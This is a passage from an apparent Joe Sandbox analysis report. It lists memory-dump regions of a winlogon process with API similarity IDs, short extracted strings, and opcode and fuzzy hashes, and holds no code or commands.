                                                   • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: dd6aa663578507b66a76ee1b3aff8a7eb3297d8e7c986e84e6755fe8025d9d4f
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: B1D1CA33B14B8889F712CFA5D440ADC37B1FB54B98F814216EE49A7B99DA36D107C386
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                   • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 18d3852c168644b29a851a8876877b9c6a5370015fb03373ffbcdf4b1c2788c7
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: FBD1C833B55B8889F712CFA5D440ADC37B1FB44B98F804256CE4EA7B9ADA35C106C382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                   • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 662269b3e822107970afb4c35fa0ae41ecd28bd6936e08448754d08bde8c420b
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 7F015732A50B84DAE715DF66A80499A77A0FBC8F88B894025DF4957728DE39D052C782
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                   • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 72ca8a3ca2c797191b1185e72d0950ed6f6b3868902fa79715834b3bdb5aef3e
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 18018B32A40B94CAE715DF62A80459977A0FB88F84F868025EB4943718DE39E052C386
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                   • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 067d4f9d96a6597854837632812c8a5965103370f5823a428bd146fe93ab2a8e
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 3F01AD73A45B84CAF715DF62E80458877B0FB88F85B464025DF4A43718DF35E191C382
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D2A28DF), ref: 000001CA7D2A2A12
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                   • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 883afdda5ac88cf6514580bd6892867edb55701f6eb5cb203455b40a889b7c34
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: 5E91F233A5075999FB528F659450BEE37A0FF94B8CF846106DE0A6BA85DB36C04783C3
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D2228DF), ref: 000001CA7D222A12
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                   • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 68b43c0824a30f871ee081a9c83458cb90aaee78de66b724d65557e9164a7766
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: 0791E033A5075899FB628F659850BED3BA0BF54B8CF854106EE0A57A94CA37D047C3CB
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D1F28DF), ref: 000001CA7D1F2A12
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                   • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 5eb7d5947bc20cfa67c7895d0bc5de5f10d0b69c3d0a7686c240678f5a04625b
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: E391EF33F5275899FB62CF659450BED3BA0BB54B8CF844146DE0A93A85DB36C446C383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                   • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 309fc4a10813a887c16493d1ce2c5572945cc3e6c6069e0ff5507602679b0d55
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 99111836B50F088AFB01CB60E8547AA33A4FB59758F840E21DE6D967A4EB78C15583C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                   • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: e1da5454589ae589727566414135aba046387261922def3505f63e54200d3d87
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: A8115736B50F088AFB00CF60E8547A833A4FB58758F840E21EA2D867A8DF78D15583C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                   • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: a1ec85385bb10c050ff026c888441d939cb2e74fe620a6861c714d04218da524
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 0371C037A84B8956F7369E26D940BEA7794FF84789FD10016DD0963B88DA36C50287C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 8d43051fae0432339c287c2151160f3a64fceb99f59810b575694d931f32b1a0
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 5371F733A8474591FB369E2A9841BEA7794FF44788F90801AED0953B84DE37C606C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 5d50e4c69690dc07a888c6352a7c53a26a02212cebad6fb895a16883e0e52a6b
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: C371C537A40B9951F7369E26D864BEA7794FB84B8AF85101ADD0943B88DE76C600C783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: fd78e535435ffec6a742ccc5ca62527ce80d22f415176f15bbae23ba0b9d84d4
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 6C518133B52B088AFB55DF15D444FA83391FB44F9CF954129AA4D47B88D77AC841C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: b460edc10a65c72ae55a20d42f54f48aa37f6c81a21e5efe8d7f1e1a140c3131
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 9161A333908BC882E7729F15E440BDAB7A0FB85B98F444215EB9C47B99CB79D191CB42
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: d06f1d6a4c4548bdff1e7c612d8bf8de8a9f368b65ed0bfbfd455b76740dd300
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 30511637A8878841F626CE26A454BEA7751FF84789FC60025ED4973B89DA37C406C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 1df65754e96209d10ce77b496f8102a845f38ec8baad36118dacfef27c9bbe4a
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: B8511537A84389C1FA268E25A455BEB7751FF84788F948229ED4903B89DA37C403C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 543a74f7f096710a94370db433aa404daddb7db03a989235164fc2747e9da801
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 9C513837E8479841F626CE25A464BEA7791FBA8B89FD40069DD4943B89DE37C500C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 2c1d7f038cfc8afa535b49b84af1afe38805e8b2e7a7ce4dff7cd2b815606423
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: E1410973A15B8886F751CF25E804BDAB7A0FB88788F844021EE4D9B744EB39C502C7C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: d46591c1412a96a10cecd863ef609a76f42ec2867853ab4bfb7008d3bc80fece
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 7341C633A1578886F7218F25E444BDAB7A4FB58788F854121FA4D87754EB3AD402C7C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 168bd5042619de978051ce00469c6fab8e07dcb428ef58c1d872ee4ec8472086
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
